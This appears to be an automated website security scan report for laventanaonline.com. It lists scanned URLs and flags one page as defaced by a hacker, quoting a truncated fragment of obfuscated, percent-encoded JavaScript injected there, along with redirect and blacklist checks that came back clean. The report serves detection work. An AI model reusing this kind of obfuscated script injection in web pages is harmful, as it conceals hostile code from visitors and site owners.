Scanned pages/files
| Request | Server response | Status |
http://www.laventanaonline.com/ | 200 OK Content-Length: 719 Content-Type: text/html | clean |
http://www.laventanaonline.com/cgi-bin/ | 403 Forbidden Content-Length: 329 Content-Type: text/html | clean |
http://www.laventanaonline.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://www.laventanaonline.com/hsh/ | 200 OK Content-Length: 59530 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) <!-- ҳ̸Ҳ̸ҳ Hacked By Antonio hacker Sakit Hati ҳ̸Ҳ̸ҳ --> <!-- document.write(unescape('%20%20%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%4A%61%76%61%53%63%72%69%70%74%31%2E%32%22%3E%0A%0A%0A%0A%66%75%6E%63%74%69%6F%6E%20%43%6C%65%61%72%45%72%72%6F%72%28%29%20%7B%72%65%74%75%72%6E%20%74%72%75%65%3B%7D%0A%0A%0A%0A%77%69%6E%64%6F%77%2E%6F%6E%65%72%72%6F%72%20%3D%20%43% Antivirus reports:
Deface/Content modification. The following signature was found: ҳ̸Ҳ̸ҳ Hacked By Antonio hacker Sakit Hati ҳ̸Ҳ̸ <title> ҳ̸Ҳ̸ҳ Hacked By Antonio hacker Sakit Hati ҳ̸Ҳ̸ҳ </title>
<Script Language='Javascript'> <!-- ҳ̸Ҳ̸ҳ Hacked By Antonio hacker Sakit Hati ҳ̸Ҳ̸ҳ --> <!-- document.write(unescape('%20%20%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67 ...[59222 bytes skipped]... | ||
http://www.laventanaonline.com/images/ | 200 OK Content-Length: 268 Content-Type: text/html | clean |
http://www.laventanaonline.com/images/roberto%20.jpg | 200 OK Content-Length: 34891 Content-Type: image/jpeg | clean |
http://www.laventanaonline.com/users/ | 200 OK Content-Length: 332 Content-Type: text/html | clean |
http://www.laventanaonline.com/users/lalo/ | 200 OK Content-Length: 5778 Content-Type: text/html | clean |
http://www.laventanaonline.com/users/lalo/lalo4.jpg | 200 OK Content-Length: 45195 Content-Type: image/jpeg | clean |
http://www.laventanaonline.com/users/lalo/index.php?ind=1 | 200 OK Content-Length: 5859 Content-Type: text/html | clean |
http://www.laventanaonline.com/users/lalo/index.php?ind=0 | 200 OK Content-Length: 5778 Content-Type: text/html | clean |
http://www.laventanaonline.com/users/lalo/index.php?ind=2 | 200 OK Content-Length: 5859 Content-Type: text/html | clean |
http://www.laventanaonline.com/users/lalo/lalo5.jpg | 200 OK Content-Length: 39983 Content-Type: image/jpeg | clean |
http://www.laventanaonline.com/users/lalo/index.php?ind=3 | 200 OK Content-Length: 5854 Content-Type: text/html | clean |
http://www.laventanaonline.com/users/lalo/Jack.Marlin1sm.jpg | 200 OK Content-Length: 203725 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: laventanaonline.com
Result:
GET / HTTP/1.1
Host: laventanaonline.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: laventanaonline.com
Referer: http://www.google.com/search?q=laventanaonline.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: laventanaonline.com
Referer: http://www.google.com/search?q=laventanaonline.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=laventanaonline.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://laventanaonline.com/
Result: laventanaonline.com is not infected or malware details are not published yet.
Result: laventanaonline.com is not infected or malware details are not published yet.